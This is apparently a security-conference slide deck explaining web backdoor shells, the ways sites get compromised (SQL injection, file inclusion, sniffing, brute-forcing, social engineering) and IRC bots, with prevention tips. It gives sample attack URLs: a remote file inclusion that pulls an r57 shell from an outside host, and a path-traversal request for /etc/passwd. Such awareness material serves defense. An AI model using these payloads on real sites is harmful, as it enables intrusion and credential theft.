Demystifying Backdoor Shells and IRC Bots: The Risk…

By : Jonathan

www.rootcon.org

Topic Overview

• Backdoor Shells ~ for websites

•How a site gets backdoored• The Risk of Backdoor Shells• IRC Bots• Some Security Tips

What’s with this topic?

• Most of the websites today are hosted on a linux server…That’s why I came up with this topic.

• And also regarding with IRC bots, most of the IRC bots are coded in perl and in php and they usually run in linux servers or ordinary linux computers.

Backdoor Shell

A backdoor shell is a malicious piece of PHP (ASP, JSP, etc) code that can be uploaded to a site to gain access to files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

How a site gets backdoored

• Through sqli or Structured Query Language Injection

• Through lfi or local file inclusion• Through rfi or remote file inclusion• Through sniffing• Through ssh or ftp cracking (bruteforcing)• Through Social Engineering

SQLI

• SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). One of the most common exploits to gain the admin’s username and password.

RFI and LFI

• Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server.

• Local File Inclusion (LFI) is the process of including files on a server through the web browser.

Example Code of RFI

www.example.com/index.php?page=http://www.google.com/

Upload a shell >>>www.example.com/index.php?page=http://www.shellhost.com/

r57.txt?

Example code of LFIOn a *nix system, this would show the

hashes of all passwords on the server, which could later be cracked and used to get file access.

http://example.com/index.php?file=../../../../etc/passwd

Sniffed Passwords

•A website could also be backdoored if a hacker or cracker sniffs his session logins in a wifi zone area.

SSH Cracking or FTP cracking

This can be achieved by bruteforcing the ports 21 or port 22 then after that the cracker uploads his shell under public_html folder or www directory.

Social Engineering or SE

• The act of manipulating a person to accomplish goals that may or may not be in the “target’s” best interest. This may include obtaining information, gaining access, or getting the target to take certain action.

The Risk• Your website can be defaced• The database can be extracted• The hacker could use your website as

a scam page or a phishing site• Hackers may also use it to bruteforce

FTP or cpanel, allowing them more access to the website

• Shell's can also be used to gain root access to the site.

• Hackers could host their IRC bots in the site• Hackers could use it for spamming like

email spamming• Hacker’s could host more backdoor shells

and spread it across your files• Hackers could host their denial-of-service

(DoS) or distributed denial-of-service attack (DDoS) shells (ex. host booter)

IRC Bots

• An IRC bot is an independent program that connects to Internet Relay Chat as a client, and so appears to other IRC users as another user. An IRC bot differs from a regular client in that instead of providing interactive access to IRC for a human user, it performs automated functions.

• Most of the IRC bots are coded in php, python and perl but the most powerful IRC bot today is coded in perl.

• Today, IRC bots are not only assigned to perform simple tasks but also does DDoS or Dos attacks, vulnerability scanning, uploads backdoor shells, and verifies credit card details.

Security Tips (Prevention)

• Keep up with the latest security updates and make sure to have a secure admin panel.

• Make sure that the admin panel is hard to find and cannot be scanned easily. Don’t name the admin panel to common names such as; admin.php, admin, admin.asp, controlpanel,etc.

• Make sure that if they do have an admin panel, make sure it only permits the user to upload .jpeg, .png, and other image file types only.

• Test your website security, use Acunetix Web Vulnerability Scanner to scan for loopholes

• Make sure that your passwords are not easy to guess or not included in the most common words. Use long passwords.. Ex. M!67a@l+a?()Ss<&ajka

• Download BotHunter (Network-based botnet diagnostic system >> http://www.bothunter.net/

• Visit http://www.sevagas.com/ and learn from Emeric Nasi of logera

• Research more… =)

Additional Infos

Zone-h.org archived 1,419,203 defaced web sites. Linux became the most used OS for web servers and of course the pre ferred target for the defacers. Why? Because of certain benefits and many things a defacer or a cracker could play around.

??QUESTIONs?

?